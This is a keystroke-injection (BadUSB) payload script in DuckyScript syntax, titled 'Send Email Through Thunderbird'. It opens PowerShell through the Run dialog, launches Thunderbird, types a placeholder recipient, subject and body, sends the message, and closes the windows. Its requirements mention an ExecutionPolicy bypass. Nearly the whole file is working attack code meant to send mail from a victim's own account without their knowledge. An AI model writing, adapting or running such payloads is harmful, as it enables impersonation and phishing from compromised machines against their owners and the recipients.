* ########################################################
* #                                                      |
* # Title        : Send Email Through Thunderbird        |
* # Author       : Aleff                                 |
* # Version      : 1.0                                   |
* # Category     : Execution                             |
* # Target       : Windows 10/11 - Linux(debian tested)  |
* #                                                      |
* ########################################################


* Requirements:
*     - Internet Connection
*     - Thunderbird installed and email configured
*     - ExecutionPolicy Bypass (for Windows target)

* This payload is tested on:
*     - Ubuntu 23.04
*     - Windows 11


* # PowerShell
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING Start-Process "thunderbird.exe"
ENTER
DELAY 4000

* # Thunderbird
CTRL n
DELAY 2000

* REQUIRED - Set receiver email address
STRING EMAIL-ADDRESS
DELAY 500
TAB
DELAY 500
TAB
DELAY 500

* REQUIRED - Set email Subject
STRING SUBJECT
DELAY 500
TAB
DELAY 500

* REQUIRED - Set email message
STRING MESSAGE
DELAY 500
CTRL ENTER
DELAY 2000
ENTER

* # End actions
DELAY 2000
ALT F4
DELAY 1000
ALT F4
